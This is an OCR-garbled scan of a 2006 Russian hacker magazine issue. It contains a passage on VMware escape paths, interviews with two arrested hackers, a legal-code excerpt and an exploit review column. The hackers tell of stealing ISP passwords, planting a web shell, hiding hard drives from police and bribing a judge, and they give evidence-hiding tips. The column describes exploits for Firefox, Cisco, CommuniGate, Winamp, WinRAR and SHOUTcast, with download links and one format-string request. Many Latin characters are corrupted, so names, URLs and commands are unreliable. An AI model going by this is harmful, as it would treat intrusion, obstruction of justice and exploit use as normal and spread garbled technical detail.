физических). Еще вирус может дотянуться 
до «ІІЗВ-свистка» и заразить все имеющие- 
ся на нем исполняемые файлы, которые кто- 
нибудь обязательно запустит на основной 
машине. Короче, возможностей много. Для 
защиты рекомендуется пропатчить ѴМ ѴѴаге, 
изменив магический номер на что-то еще. 
Неофициальная заплатка лежит здесь: бНр:// 
бопеѵпеі.гзіаск.ога/іооіз/ѵтраісіі.с . офици- 
альных пока нет и, по-видимому, в обозримом 
будущем и не предвидится. Но даже залатан- 
ная система по-прежнему остается уязвимой, 
поскольку подобрать нужные магические 
числа можно и брутфорсом, так что вариантов 
не так уж и много — 16-битный номер порта, 
плюс 32-битный «пирожок» дают менее 48 
значимых битов! «Менее» — это за вычетом 
стандартных номеров портов, которые нельзя 
использовать. 

ПРОЧИЕ СПОСОБЫ 

Для обмена мелкими порциями данных между 
виртуальной машиной и основной системой 
удобно использовать гибкий диск. Просто даем 
эмулятору физический доступ к устройству А: 
(В:), и все — кранты! Если вирус внедрит в Ьооі- 
сектор зловредный код, то дискета окажется 
забытой в дисководе и этот дисковод будет 
первым загрузочным устройством в ВІОЗ Зеіир, 
когда-нибудь зловредный код получит управле- 
ние и сможет поразить жесткий диск основной 
системы. 

Существуют и другие сценарии проникнове- 
ния, однако они еще менее жизнеспособны и 
поэтому здесь не рассматриваются. 

ЧТО ЖЕ ДАЛЬШЕ? 

Эмулятор — это очень удобная вещь, однако 
от разведения вирусов в недрах виртуальной 




особенности национальной охоты на 
вирусы или загон для вирусов 



машины я советую воздержаться: «скорлу- 
па», отделяющая гостевую систему от реаль- 
ного мира, слишком тонка, и против грамотно 
спланированной атаки ей не устоять. Можно, 
конечно, запустить эмулятор в эмуляторе 
(например, ВОСНЗ внутри ѴМ ѴѴаге), только 
это все равно не решит всех проблем, а вот 
производительность упадет колоссально! 
Отельный жесткий диск в этом плане намно- 
го надежнее, да и удобнее. Кстати говоря, 
отключать основной диск необходимо чисто 
физически — путем отрубания кабеля. Диски, 
перечисленные в основном разделе ВІОЗ, 
актуальны только на стадии первичной загруз- 
ки, а дальше весь обмен идет через драйвер 
защищенного режима, работающий напря- 
мую с контроллером. Отключение каналов 
интегрированного контроллера через ВІОЗ 
Зеіир, как правило, делает диски невидимы- 
ми, да и штатными средствами ѴѴІпбоѵѵз до них 
не дотянуться, однако зловредный код при 
большом желании со своей стороны может 
перенастроить контроллер на ходу, подцепив 
все каналы. Естественно, это системно-зави- 
симая операция и все контроллеры програм- 
мируются по-разному, но поддержать пару- 
тройку самых распространенных чипсетов 
вполне реально! 

Корочеговоря, «дедовские» способы — самые 
надежные, но неудобные. Виртуальные маши- 
ны удобные, но ненадежные. Вот и выбирай! 

ВІНДНѴ ѴОЦН'З ц-с 




настройка виртуальной сети в ѴМ ѴѴаге 




фрагмент исходного текста ѴВЗ-вируса 




фрагмент исходного текста ѴВЗ-вируса 
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ОТЫГРАЛИСЬ! 

ПОДВОДИМ ИТОГИ КОНКУРСА ОТ КОМПАНИИ АѴЕ 



ПЕРВОЕ МЕСТО 
ДОСТАЕТСЯ 
СЕТУНОВУ 
АЛЕКСАНДРУ. 

ОН ПЕРВЫЙ ВЕРНО 
ОТВЕТИЛ НА ВСЕ 
ВОПРОСЫ. 




С200 

250 у.е. 



АКУСТИЧЕСКУЮ 
СИСТЕМУ С200 
ПОЛУЧАЕТ МАКС 
ФРИШ. ОН ВТОРОЙ 
ПРИСЛАЛ ВЕРНЫЕ 
ОТВЕТЫ. 




И ПОСЛЕДНИЙ 
ПОБЕТИЛЬ — 
НИКОЛАЙ ИВАНОВ. 
ОН ВЫИГРАЛ 
КОЛОНКИ АѴЕ 060. 






взлом 



Все мы наслышаны о громких судах над пойманными хакерами. То тут, то там доб- 
лестные работники силовых органов принимают сетевых негодяев и ведут несчас- 
тных хакеров на суд. Самое интересное во всем этом — узнать, как все выглядит 
со стороны хакеров. О чем они думают, что говорят, как реагируют. Специально 
для тебя мы нашли двоих хакеров, у которых в разное время были серьезные про- 
блемы с законом. Вот что они рассказали нам. *ДЖ|1 ИД 







ТЕХТ 30І_Ю ЗЫАКЕ & ЗРЗК7ЕВХ [ѲНОЗТ] 



В ГОСТЯХ У ПРОКУРОРА 




взлом 




КАК ПРИНИМАЛИ 




Зоіісі Я паке: 



Я вернулся домой из института уставшим и голодным. 
Изрядно наевшись, прилег отдохнуть, но сон не был 
долгим, так как буквально через несколько минут 
меня разбудила мать, сказав, что звонят из военкома- 
та. Голос в трубке представился какой-то фамилией 
и назвал свое звание. Состоялся такой вот примерно 
диалог 

(В)ояка — Вы такой-то такой-то (мое ФИО)? 
(Я) — Да, так точно 

(В) — Вы учитесь в институте таком-то (назвал 
мой инст)? Почему вы не предоставили воен- 
комату справку о том, что учитесь в институ- 
те? Вы уже достигли призывного возраста 
и должны пройти службу в армии. Если вы 
учитесь в ВУЗе, то должны предоставить нам 
соответствующий документ. 

(Я) — Ну, я думал, этими делами должен 
институт заниматься. И что я теперь должен 
делать, раз вопрос так стал? 

(В) — Подойдите сейчас к вашему военкома- 
ту, я вас там буду ждать. 

(Я) — Хорошо, сейчас буду. 



Ладно, делать нечего. Нужно идти, а то еще загребут в 
армию. Примерно через полчаса подхожу я к террито- 
рии военкомата, и в дверях меня встречают двое мужи- 
ков лет под 30 — 35. Одеты они были в костюмчики, при 
галстуке — никаких погонов. Вдруг один из них, лысый, 
как бильярдный шар, подходит ко мне и говорит: 

(Л)ысый — Ты такой-то такой-то? 

(Я) — Да, это я 

(Л) — Служба Безопасности Украины! 

Тут он достал документы и показал мне, офигевшему 
второй раз за этот день, и предложил сесть к ним в 
машину. Я вдруг понял, что, если не сяду сам, мне зало- 
мают руки, и я поеду связанным в бардачке. Мысль об 
этом не вызывала абсолютно никакой радости. Мы впя- 
тером уселись в тачку и тронулись. 




хРЗк7еКХ: 



Как же хорошо поспать солнечным летним утром. 
Особенно после двух дней вкалывания без сна. Так 
вот я и спал мертвым сном, пока не проснулся от 
странных голосов в прихожей. Дверь незнакомцам 
очевидно открыл кто-то из родственников. Еще не до 
конца поняв ситуацию и сладко потягиваясь, я хотел 
встать и выяснить, что там происходит. И вот, на тебе! 
Не успел и глазом моргнуть, как в комнату ворвались 
3 человека с бумагами и протоколами наперевес. 



За ними следом — две девушки. 

Конечно же, я сразу понял, что происходит, меня охва- 
тили шок и паника. Представляете, как тебя буквально 
из сна пробуждают и заявляют: «Ну, Александр, как 
поживаешь? У нас ордер на обыск. Много же натворил 
ты. Сейчас составим все акты, возьмем твое барахло 
электронное и поедем по делам, приятель. Ты, главное, 
не суетись». 



ЧТО НАТВОРИЛИ 




Зоіісі 8 паке: 



Пару дней назад у меня как раз кончился инет, а платить 
«Укртелекому» $50 за плохой диалап мне надоело. И 
вдруг я вспомнил про ІЗР «Северная Пристань», у кото- 
рого когда-то покупал инет. Пришел я, значит, к ним 
туда, заново зарегался, ну и положил на счет десять 
баксов для начала. Вечером пришел домой, зашел в 
инет и почему-то заглянул на страничку своего нового 



прова. Там я увидел баг, и понеслось... Через полча- 
са я честно спионерил с серверной машины все пары 
логин/пароль из папки сервера статистики с помощью 
небольшого регі-скрипта. Напоследок оставил в одной 
из веб-папок шелл — вдруг еще понадобится машина. 
Заархивировал файл с паролями и скачал себе. С тех 
пор прошло два дня. 




$Р31с7еКХ: 




Оставлю этот пункт без комментариев. Скажу только, 
что это была серьезная история, связанная с финан- 
совыми делами, банками и тому подобными вещами. 
Говорить об этом даже сейчас не хочется. Поймите 
правильно. 
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ОБЫСК И ДОПРОС 





Зоіісі Я паке: 



Мы продолжали ехать в машине. 

«Ты пытался сканировать сеть компьютеров на уязви- 
мости?» — вдруг перебил мои размышления Лысый. 
Это фраза звучала настолько нелепо и была произне- 
сена с таким серьезным лицом, что даже я, находясь 
не в самом уверенном положении, про себя тихонько 
загыгыкал. В ответ ему я пожал плечами и сделал гри- 
масу боксера, пытающегося решить квадратное урав- 
нение. 

«Ты пытался совершить свои грязные дела через 
русский сайт?!» — никак не успокаивался он (когда я 
запускал соппесІ-Ьаск Ьаскбоог, я юзал свой шелл в 
зоне .ру). Я вел себя не как преступник, а скорее, как 
жертва. Всю дорогу в машине я сидел с озабоченным и 
даже обиженным лицом. Решил занять позицию гофри- 
рованного шланга, который по теме компов ничего не 
понимает и только лишь прочитал статью «Как правиль- 
но похакать Пинтогон за пицот минут». 

Тем временем мы подъехали к красивому зданию с мра- 
морными ступеньками. Через несколько секунд мы с 
одним из оперативников оказались в просторной ком- 
нате, где из мебели были только пара стульев да стол, 
окна были плотно закрыты жалюзи. Это и была комната 



для допроса. Опер сел напротив меня, протянул бумаж- 
ку и ручку, объяснил , что сейчас я должен буду написать 
все, как было. На деле все оказалось чуть по-другому: 
опер сам принялся мне диктовать, что писать в прото- 
коле допроса. Поскольку этот человек не слишком уж 
обременен ІТ-знаниями, получилась натуральная бели- 
берда, которая понравилась и мне, и оперу: он лишь 
прочел все с самого начала и одобрительно кивнул. 

Мы поехали ко мне домой «опечатывать оборудование». 
Главной уликой суждено было стать моему ноутбуку, 
так как именно на нем я делал вое свои последние дела 
и именно его забрали на экспертизу в органы. Надо 
сказать, что вся схема моего задержания была бы прос- 
то абсурдна, если бы на входе в здание с мраморными 
ступеньками у меня не забрали мобильный телефон. 
Ведь за время допроса и пока мы ехали, я легко мог 
бы позвонить домой или написать смс родственникам, 
чтобы они все компьютеры, диски и ноутбук спрятали в 
каком-нибудь глубоком погребе. В этом случае я мог бы 
просто даже не прикидываться шлангом, а им стать. Но 
у меня не было никакой возможности связаться с родс- 
твенниками, поскольку те были уверены, что я поехал 
просто в военкомат отвезти справку. 



'Ѣ, 



хРЗк7еКХ: 



У меня дома опера вели себя вполне доброжелательно. 
Расспрашивали на самые отвлеченные темы: интересы, 
хобби и прочее. Потом сразу заявили, чтобы я достал 
все электронные носители, мобильники, флешки. 
Попросили подключить и собрать компьютер, так как 
он валялся в полусобранном виде, а его им надо было 
упаковать и забрать. На мою оценку они оказались пол- 
ными ламерами, которые ничего не смыслят даже в том 
бреде, о котором говорят. Они не могли отличить даже 
ІВ с проводом на три метра от флешки. Одним словом, 
мозг сразу прояснился и был наспех придуман план (ты 
всегда умом отличался. — Прим. ред.). Во время сбора 
компьютера, дождавшись удобного момента, когда они 
отвернулись, я наспех отрубил винты и бросил за гар- 
нитуру. Винты упали с железным стуком об пол, при- 
шлось уронить еще закрывающую часть от корпуса, 
сказав, что упала она. Как ни странно, они поверили :). 



Я закрыл компьютер без винтов и счастливым взором 
смотрел, как они его опечатывают :). Часа четыре они 
описывали все собранное, заставили расписаться и 
затем проводили в местную прокуратуру — отдел «К». 
Мой допрос им ничего не дал. Они мне предъявили 
целую пачку логов провайдера и множество других 
улик. Поставили статьи 272, 273 п.1, объяснили ситуа- 
цию, рассказали возможности. Теперь я понял, почему 
обычно люди, действующие в сговоре, берут вину на 
себя: по пункту первому, если ты один, срок отбывания 
в два раза меньше, чем по пункту второму — в сговоре. 
И степень тяжести дела падает на 1 уровень. Почти год 
пришлось терпеть бесконечные вызовы в отдел, допро- 
сы и разные бюрократические проволоки. 



ЧЕМ ВСЕ ЗАКОНЧИЛОСЬ 




Зоіісі Я паке: 



Тебе, конечно, интересно, чем все закончилось. Как 
мне пообещал следователь, за то, что я сотрудничал с 
ними (да и вообще по составу преступления), скорее 
всего, мне будет грозить либо штраф, либо условный 
срок в 1 ,5 года. Судимость, хоть и условная, как ты сам 
понимаешь, не есть гуд, так как я уже буду считаться уго- 
ловником. А это создает лишние проблемы везде: при 



трудоустройстве, при переезде за границу и так далее и 
тому подобное. По этой причине мне сейчас предстоит 
дожидаться решения суда, параллельно башляя денег, 
чтобы мне выписали квитанцию на небольшой штраф, а 
не сделали меня уголовничком. Такие дела. 




т 1 

і. 4 



5РЗк7еКХ: 



Моя история закончилась весьма неплохо. Немного 
везения, связи, хороший адвокат, несколько штук бак- 
сов судье и дело закрыли за примирением сторон. С 
деньгами проблем не было, а вопрос с судимостью и, 
вообще, какими-либо санкциями просто отпал. Все, что 
так серьезно началось, так бесславно рассосалось. 
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СЛАВА 




Зоіісі Я паке: 



Как выяснилось позже, мое дело было довольно шум- 
ным. Раньше СБУшникам удавалось ловить в основном 
голодных студентов, которые тырили и продавали диа- 
лап. Причем в прессе в свое время появилась статья 
о «горе-хакерах». Самое смешное, что журналюги ни 
капли не смыслят в этом деле, пишут полную чушь и 
абсолютно не в тему употребляют понятие «хакер». Я 
думаю, если ты хоть раз читал такие статьи в «желтой 
прессе», то понимаешь меня. Среди знакомых, какая уж 
слава. Попался на такой фигне, как пятилетка просто. 




$РЗк7еКХ: 



В одной из поездок я вдруг услышал по радио, как гово- 
рили о взломе. Пришел домой, включил телевизор. По 
новостям говорили о взломе. И не каком-нибудь... а 
Сбербанка. Даже в отделе «К» бывают утечки инфор- 
мации. На этот раз проболтался репортерам соседний 
следователь по кабинету. Они не называли имен. Но 
когда едешь в маршрутке, и кто-то обсуждает тебя, 



это довольно неприятно. Да, наверное, и ты слышал о 
моем процессе из СМИ: желтая пресса Интернета, и в 
том числе известный нам СекЛаб пошли по их стопам. 
Журналюги, как всегда, постарались раздуть вселенс- 
кий кризис из ничего. Многие люди даже пошли заби- 
рать вклады из Сбербанка :). 



И НАПОСЛЕДОК 




Зоіісі 8паке: 



Старайся не трепаться со всеми о своих подвигах или 
обсуждай это только с хорошим знакомым, которым 
полностью доверяешь. Ну а ключевой момент личной 
безопасности — это, конечно же, шифрование разде- 
лов жестко диска. Хакер уже все уши, наверное, тебе 
прожужжал программами вроде ТшеСРѴРТ, ВезіСгурІ 
и т.д. И в самом деле, если хочешь сохранить конфи- 
денциальность своих данных, то лучше всего собрать 
самое ценное, создать невидимый шифрованный кон- 
тейнер и спрятать все там. Между прочим, таких про- 
грамм полно под РОЗІХ-оси, поэтому, даже если ты 
юзаешь альтернативную ось, то все твои данные будут 
надежно сохранены. Либо храни весь свой арсенал на 



флешке или ДВД, чтобы было удобно носить и прятать. 
Еще одна важная вещь. В моей истории отряд СБУ не 
вламывался в мою квартиру и не ставил лицом к стенке, 
они повели себя немного по-другому. Довольно часто 
мусора просто вызывают ОМОН, ломают твои двери и 
вяжут тебя вместе с компом. Предварительно, конечно, 
вырубают в квартире свет, поэтому если на компе был 
какой-то компромат на тебя, то потереть уже ты его не 
сможешь. Вот так вот. Поэтому купи себе хороший ІІР$ 
— он может не раз спасти шкуру в критической ситуа- 
ции. Я не берусь тебя ничему учить — просто рассказал 
мнение по этому вопросу. 




8Р31с7еКХ: 



Меня не пугает ни судимость, ни срок. Я прекрасно 
знаю свой путь в такой стране, как наша. И даже в тюрь- 
ме может быть неплохо, если просто представить на 
срок ее своим домом. 
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Вообще, опера, которые занимаются хай-тек преступлениями, 
по большей части полные пни. Вот хотя бы взять историю Зоііб 
Злаке. 

(С)ледователь — Значит, ты зашел на сайт, говоришь? И что 
потом? 

(Я) — Потом я подключил к странице рбр-файл //это на самом 
деле обычный іпсіисіе был 

(С) — Ага, значит, ты подключил и вот эту вот пэашпа(!), что она 
потом делала?// я чуть не заржал, чесслово 
(Я) — ну, она запустила регі-программу, которая соединила их 
компьютер с моим // как со слов понятно, я запустил обычный 
коннект-бэкдор на перле, чтобы получить доступ к терминалу. 

(С) — Ясно, ну а что ты делал потом? Какой программой ты воро- 
вал пароли? 



Здесь я хочу сделать лирическое отступление. Большинство 
СБУшников и оперов, в частности, считают, что для взлома все 
пользуются «специальными программами». То есть, чтобы взло- 
мать веб-сервер, например, ты скачиваешь какую-то суперкрутую 
программу, и она взламывает сервер. Туповато, да? То есть они 
смотрят немного плоско. Допустим, каждый бэкдор или простой 
скрипт они называют «программами для взлома» и хотят узнать, 
где ты ее достал. У служб безопасности понятия о компьютерах и 
взломах немного искривленные, так как в большинстве случаев 
сами они с этим не сталкивались, а все свои «знания» черпали, 
скорее всего, из низкокачественной литературы. Вот и получает- 
ся потом, что «в Интернете обитают злостные программы: хаке- 
ры, крэкеры, куки, спамы, закладки, главной целью которых явля- 
ется уничтожение информации» (с). Ну о чем еще с ними можно 
говорить, приятель? Только, может, о рыбалке если. Подледной. 
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ОТ РЕДАКЦИИ 




Глава 28. 

ПРЕСТУПЛЕНИЯ В СФЕРЕ КОМПЬЮТЕРНОЙ ИНФОРМАЦИИ 

Статья 272. Неправомерный доступ к компьютерной информации 

1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на 
машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это 
деяние повлекло уничтожение, блокирование, модификацию или копирование информации, нарушение 
работы ЭВМ, системы ЭВМ или их сети, — наказывается штрафом в размере до двухсот тысяч рублей 
или в размере заработной платы или иного дохода осужденного за период до восемнадцати месяцев, 
либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на 
срок до двух лет. 

(в ред. Федерального закона от 08.12.2003 N 162-ФЗ) 

2. То же деяние, совершенное группой лиц по предварительному сговору или организованной группой 
либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе 
ЭВМ или их сети, наказывается штрафом в размере от ста тысяч до трехсот тысяч рублей или в размере 
заработной платы или иного дохода осужденного за период от одного года до двух лет, либо исправи- 
тельными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, 
либо лишением свободы на срок до пяти лет. 

(в ред. Федерального закона от 08.12.2003 N 162-ФЗ) 

Статья 273. Создание, использование и распространение вредоносных программ для ЭВМ 

1 . Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приво- 
дящих к несанкционированному уничтожению, блокированию, модификации либо копированию инфор- 
мации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распростране- 
ние таких программ или машинных носителей с такими программами наказываются лишением свободы 
на срок до трех лет со штрафом в размере до двухсот тысяч рублей или в размере заработной платы 
или иного дохода осужденного за период до восемнадцати месяцев. 

(в ред. Федерального закона от 08.12.2003 N 162-ФЗ) 

2. Те же деяния, повлекшие по неосторожности тяжкие последствия, наказываются лишением свободы 
на срок от трех до семи лет. 

Статья 274. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети 

1. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, 
системе ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой зако- 
ном информации ЭВМ, если это деяние причинило существенный вред, наказывается лишением права 
занимать определенные должности или заниматься определенной деятельностью на срок до пяти лет, 
либо обязательными работами на срок от ста восьмидесяти до двухсот сорока часов, либо ограничени- 
ем свободы на срок до двух лет. 

2. То же деяние, повлекшее по неосторожности тяжкие последствия, наказывается лишением свободы 
на срок до четырех лет. 



Хочется добавить, что нельзя забывать о законах стра- 
ны, в которой ты живешь. Этот материал — просто при- 
мер того, как бывает в жизни. Слава Богу, те, кто это 
писал, сейчас на свободе. Естественно, так бывает не 
со всеми: некоторые напишут только тогда, когда вый- 
дут :). Судимость по 272 — 274 статьям УК РФ и подобным 
в других странах — это огромный плевок в будущее. Не 
стоит забывать об этом! 



Здесь многие хакера 
кончают свою карьеру 




ХАКЕР 03 /87/ 06 



081 



Мазіег-Іате-тазіег 




РІВЕРОХ 

І_ОСАТІ(ЖС!иЕРІУІІ\ІТЕПРАСЕ0 ЕХРДОІТ 



описание: Если ты регулярно читаешь этот 
обзор, то в курсе недавней уязвимости в «бе- 
зопасном» браузере РігеРох, которая ведет к 
ЬиІІег оѵегііоѵѵ при переполнении заголовка 
страницы. Пользователям РігеРох это очень не 
понравилось, однако по истечении некоторого 
времени, юзеры забыли о невзгодах и продол- 
жили использовать файрфокс. 

Спустя некоторое время, 7 февраля, на лен- 
тах багтрака появилась сводка о новых багах 
в Могіііа Рігеіох. На сей раз их насчитали аж 7 
штук. В основном все баги таятся в обработ- 
чике ЗаѵаЗсгірІ. Одна из ошибок заслуживает 
особого внимания, так как для нее вышел 
эксплойт. Брешь заключена в неправильной 
обработке метода І-ОсаІіоп.ОиегуІпІегІасе, 
благодаря чему можно переполнить буфер и 
выполнить произвольный код. Изящно напи- 
санный перловый сплоит открывает сокет и 
ожидает подключений. После соединения 
эксплойт заполняет память, а затем вызывает 
1-ОСаІіоп.С!иегуІп1еі1асе. В результате происхо- 
дит переполнение, и Рігеіох умирает. 

защита: Описанные уязвимости существуют 
в версии 1.5 и во всех ранних релизах. В бра- 
узере РігеРох 1.5.1 все бреши исправлены. 
Если в настройках включено автообновление 
версий, то браузер сразу обновит себя, в против- 
ном случае рекомендуется скачать с уууѵуу.гподі- 
Іа.ога последний релиз. 

ссылки: Скачивай эксплойт по адресу: 
уууѵуѵ. хакер. ги/розІ/30043/сІеІаиИ.азр . 

злоключение: Многие говорят, что РігеРох 
является самым безопасным софтом по срав- 
нению с ІЕ и Орега. Но последние новости 
багтрака наверняка заставят задуматься над 
вопросом безопасности и, возможно, перейти 
на другой браузер. 

дгееіе: К сожалению, автор эксплойта остался в 
тени, но известно, что эксплойт впервые появил- 
ся на ресурсе уууууѵ.теіазріоіі.сот . 
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апускаем ядовитый сервер 



СІЗСО АІВОМЕТ АВР АТТАСК I СОММІІІЧІОАТЕ РВО ЗЕВѴЕВ 

ѵііичЕВАВіитѵ 



описание: Каждый сисадмин с уверенностью 
скажет, что Сізсо — самый надежный и безо- 
пасный девайс. Однако над вопросом безопас- 
ности следует очень хорошо задуматься. По- 
мимо дырок, встречающихся в Сізсо-девайсах, 
которые были оперативно залатаны, существу- 
ет новый опасный баг, выявленный совсем не- 
давно. Ошибка затаилась в обработчике АВР- 
пакетов. Злоумышленник может послать уст- 
ройству большое число поддельных АВР-паке- 
тов, которые будут постоянно добавляться в 
АВР-таблицу. В итоге киска благополучно 
сдохнет (если быть точным, то произойдет бло- 
кировка входящего и исходящего трафика). 
Оживить устройство можно лишь ребутом или 
принудительной очисткой таблицы. 

Эксплойт написан на Си и имеет всего один па- 
раметр — ІР-адрес роутера. После непродолжи- 
тельной паузы сплоит запустит цикл с бесконеч- 
ной генерацией АВР-пакетов. 

защита: Защититься от напасти можно толь- 
ко после обновления прошивки с официально- 
го сайта уууѵуу.сізсо.согп . 

ссылки: Взять эксплойт можно по ссылке: 
уууѵуу. хакер. ги/розІ/29813/сіе(аиИ.а50 . Посмот- 
реть детали уязвимости и список дырявых 
устройств можно по этой же ссылке. 

злоключение: Новый эксплойт подкинул ку- 
чу проблем и без того занятым администрато- 
рам. Теперь им придется перепрошивать де- 
вайс или очищать АВР-таблицу после очеред- 
ной хакерской атаки :). 

дгееіз: Найти уязвимость удалось некому Эрику 
Смиту (12 января 2006 года). Чуть позже хакер 
под псевдонимом Разѵ (разѵпіпіа@атаіі.сот 1 на- 
колбасил мощный эксплойт. 



описание: До нынешнего месяца, по моему 
скромному мнению, самым безопасным почто- 
виком оставался СоттипіОаІе Рго от произво- 
дителя уууѵуу.зіаікег.сот . Обуславливалось это 
тем, что Сталкер поставлял продукт в бинарном 
виде без разглашения исходных кодов продукта. 
Однако каким-то образом хакеры нашли баг в 
компоненте ШАР при обработке отрицательно- 
го значения длины в полях Вазіс Епсобіпд Виіез 
(ШАР вертится на порту 389). Сразу после ана- 
лиза дырки был написан мощный эксплойт, уби- 
вающий почтовый демон. 

Эксплойт реализован на языке РуТИоп и должен 
быть отредактирован на предмет полей ІіозІ- 
пате и рог! в начале кода. После запуска сплоит 
посылает серверу роковой шелл-код, в резуль- 
тате чего Соттипідаіе Рго падает в кору. 

защита: Уязвимыми являются все версии до 
релиза 5.0.7, уже выложенного на официаль- 
ном сайте почтовой системы. Поэтому един- 
ственным верным решением является обновле- 
ние программного продукта. Как альтернативу 
могу посоветовать зафильтровать 389 порт с 
помощью встроенного файрвола. 

ссылки: Скачать эксплойт можно по адресу: 
уууууу. хакер. ги/розІ/29884/сіеІаиИ.азр . Детали 
уязвимости пока не разглашаются. 

злоключение: СоттипіѲаІе Рго является од- 
ним из самых распространенных проектов в силу 
своей мощности. Этот почтовик имеет как 
РОРЗ/ІМАР, так и ЗМТР-части, умеет сни- 
мать/отправлять почту по 88І-, имеет встроенные 
компоненты ѴѴеЬМаіі, ѴѴеЬАсітіп и ШАР (послед- 
ним он себя и погубил :)). Поэтому ленивые адми- 
ны полюбили этот демон. А благодаря его закры- 
тости совсем позабыли об обновлении. В резуль- 
тате этого хакерам будет чем поживиться. 



дгееіз: И опять порадуемся за русских програм- 
мистов. Эксплойт был написан хакером Евгением 
Легеровым. Социальное происхождение и почто- 
вый адрес злоумышленника не уточняются :). 




смерть киски 



укол для СоттипіѲаІе 
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ѴѴІІЧАМР <= 5.12 НЕМОТЕ ВОР ЕХРЮІТ 



описание: Перейдем к продуктам, которыми 
пользуется каждый уважающий себя человек. На 
этот раз ошибка нашлась в популярном плеере 
ѴѴІпатр версии 5.12. Очередное переполнение 
буфера закралось в обработчике плей-листов из- 
вестного проигрывателя. Злоумышленник может 
создать кривоватый плей-лист с неправильным 
значением параметра РІІеІ в нем (которое, ясен 
перец, содержит шелл-код). В результате этого 
обработчик переполнит буфер и запустит произ- 
вольный код. В эксплойте демонстрируется слу- 
чай, как после загрузки плей-листа может запус- 
титься калькулятор :). Впрочем, никто не мешает 
хакеру изменить встроенный шелл-код, вставив 
туда запуск чего-нибудь существенного. 
Эксплойт написан на Си и содержит немного 
кода. Здесь происходит генерация плей-листа 
с неприемлемым значением уязвимого пара- 
метра. Далее этот лист должен быть загружен 
в плеер. Последствия этого описаны выше. 

защита: На официальном сайте — 
уѵуѵѵѵ.'л/іпагтю.сот — красуется надпись, гласящая 
о том, что 1 .30.2006 выпущен новый ѴѴІпатр 5.13 
с исправленной критической уязвимостью. О ка- 
кой баге идет речь, ты наверняка догадался :). 

ссылки: Забирай исходники эксплойта от- 
сюда: ѵѵѵѵѵѵ.хакер.щ/оо5{/29855/сІе(аиИ.а5Р . 

злоключение: Давай пофантазируем о том, 
как хакер может использовать данный баг. 
Естественно, что удаленно ошибку никак не 
применить — уязвимость имеет сугубо локаль- 
ный характер. Однако ничто не мешает с по- 
мощью нехитрых приемов социальной инжене- 
рии убедить ламера загрузить через ІСО плей- 
лист с прикольной музыкой в стиле «хакер- 
транс» или просто выложить плей-лист на раск- 
рученный ресурс для всеобщего обозрения. 

дгееіз: Идея и эксплойт принадлежат кодеру 
АТтаСА ( а1таса@ісатаіІ.сот . 
ѵѵѵ'/ѵѵ.аІтасазоН.согті ). который передает привет 
и благодарность своему другу Когап’у :). 









винамповый калькулятор 



ѴѴІІЧВАП 3.30 ЮЫО РИЕЫАМЕ ВОР 



описание: РІастало время для описания еще 
одного эксплойта для популярного продукта — 
ѴѴІпВАВ. РІовая уязвимость позволяет уронить 
приложение или выполнить произвольный код 
в системе. Ошибка тривиальна: строка, содер- 
жащая множество символов, передающаяся в 
качестве параметра к приложению, убивает 
ѴѴІпВАВ наповал. Выпущенный эксплойт реа- 
лизует данную уязвимость за пару секунд, ге- 
нерируя специальную строку с последующим 
запуском ѴѴІпВАВ. Ріа самом деле, ничего осо- 
бенного в эксплойте нет — происходит инициа- 
лизация «нехорошей» строки и передача ее 
ѵѵіпгаг.ехе. Исходя из этого, сплоит должен быть 
запущен в директории сЛргодгат 1ІІез\ѵѵіпгаг. 

защита: Ріа официальном сайте давно знают 
про уязвимость, поэтому все версии старше 
3.30 не являются дырявыми. Советую скачи- 
вать последний релиз архиватора 3.51 . 

ссылки: Эксплойт полностью готов к упот- 
реблению и находится по адресу: 
уууууу. хакер. ги/роз1/30076/сІе(аиИ.азр 

злоключение: Данная дырка не первая за 
историю развития ѴѴІпВАВ. Пару лет назад су- 
ществовала похожая уязвимость, но мир о ней 
быстро забыл. Учитывая то, что в приватных 
кругах обязательно существует эксплойт, вы- 
полняющий произвольный код, а не только 
убивающий архиватор, многие юзеры могут 
попасть под хакерский прицел. А если принять 
во внимание тот факт, что обновлять архива- 
тор будет разве что параноик, последствия 
ошибки будут весьма плачевными :). 

дгееіз: Сплоит написали программисты 
т1і_р0гіаі и Эг-СерИаІеХ из команды Тгар-5е1 
II. Н. Контактный е-таіі: 

АІрІпа_Ргодгаттег@ І_іпихМаіІ.ОВѲ :). 



8НОІІТСАЗТ ПЕМОТЕ РОВМАТ ЗТВІМѲ 
ѴІЛЫЕРІАВіиТѴ 



описание: Всем известно происхождение 
программного продукта 8НОІІТсаз(. Этот проект 
от ІМиНЗой позволяет вещать музыкальный поток 
через ІпІегЫеі Не так давно в программе был 
найден сокрушительный баг, приводящий к за- 
пуску произвольного кода на уязвимой системе. 
Если быть кратким, уязвимость форматной стро- 
ки реализуется путем обращения к серверу сле- 
дующим запросом: 
МПр://Ііоз1:8000/соп1еп1/%п.трЗ, 
где %п — коварная последовательность, приво- 
дящая к фатальным последствиям. 

Запущенный эксплойт обращается к серверу, 
передавая туда специальный шелл-код, после 
чего на машине запускается ЬіпсІ 7000 порта с 
закрепленным командным интерпретатором. 

защита: Брешь таится во всех версиях 
ЗНОІІТСазІ до релиза 1 .9.4 включительно. По- 
этому логичным шагом к спасению будет посе- 
щение ресурса — ѵ'/ѵѵѵѵ.зІюиІсазТсот — и ска- 
чивание свежего программного продукта. 

ссылки: Эксплойт и подробное описание 
дырки можно найти по адресу: 
уууууу. хакер. ш/розІ/29844/сІеІаиИ.азо . 

злоключение: Каждая уважающая себя ло- 
кальная сеть имеет свой радиосервер. А основ- 
ная масса таких серверов крутит радио именно 
через ЗНОІІТСазІ (либо ІСЕСазІ под ипих, но та- 
ких машин меньше). А теперь представь, сколько 
виндовых серверов могут затроянить хакеры, 
учитывая тот факт, что многие сети разрешают 
внешние подключения к своим ресурсам. 

дгееіз: Благодарим за идею чувака Тотазг 
Тгоіапоѵѵзкі (опезіер), а за ее реализацию уже 
другого хакера — Эатіап Риі <рисік@сс- 
